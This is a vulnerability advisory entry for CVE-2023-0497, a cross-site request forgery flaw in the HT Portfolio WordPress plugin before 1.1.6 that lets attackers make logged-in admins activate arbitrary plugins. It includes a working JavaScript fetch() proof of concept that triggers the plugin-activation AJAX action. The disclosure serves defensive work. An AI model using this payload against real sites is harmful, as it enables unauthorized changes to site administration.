Lucene search
Lana CodesWPEX-ID:AE5B7776-9D0D-4DB8-81C3-237B16CD9C62HistoryFeb 28, 2023 - 12:00 a.m.
HT Portfolio < 1.1.6 - Arbitrary Plugin Activation via CSRF
2023-02-2800:00:00
Lana Codes
50
ht portfolio
arbitrary plugin activation
csrf
woocommerce
exploit
0.001 Low
EPSS
Percentile
29.4%
The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack
activate woocommerce plugin exploit:
fetch('http://localhost/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=htportfolio_ajax_plugin_activation&location=woocommerce/woocommerce.php',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Related
wpvulndb
wpvulndb
HT Portfolio < 1.1.6 - Arbitrary Plugin Activation via CSRF
2023-02-28 00:00:00
cvelist
cvelist
CVE-2023-0497 HT Portfolio < 1.1.6 - Arbitrary Plugin Activation via CSRF
2023-03-27 15:37:43
cve
cve
CVE-2023-0497
2023-03-27 16:15:08
nvd
nvd
CVE-2023-0497
2023-03-27 16:15:08
prion
prion
Cross site request forgery (csrf)
2023-03-27 16:15:00
wordfence
wordfence